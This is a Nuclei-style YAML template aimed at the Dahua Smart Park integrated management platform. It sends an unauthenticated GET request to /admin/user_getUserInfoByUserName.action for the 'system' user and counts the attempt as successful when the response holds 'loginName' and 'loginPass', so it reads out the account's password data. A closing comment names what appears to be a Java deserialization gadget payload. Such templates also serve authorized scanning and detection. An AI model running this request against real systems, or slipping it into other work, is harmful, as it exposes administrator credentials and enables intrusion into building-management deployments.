id: dahua-smart-park-getUserInfo

info:
  name: 大华智慧园区综合管理平台密码读取
  author: H0nayuzu
  severity: high
  description: |
    大华智慧园区综合管理平台密码读取
  tags: passwdread

http:
  - raw:
      - |
        GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        X-Requested-With: XMLHttpRequest
        Content-Type: application/json; charset=UTF-8
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close


    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "loginName"
          - "loginPass"


# user ysu_CommonsBeanutils2_EX-TomcatEcho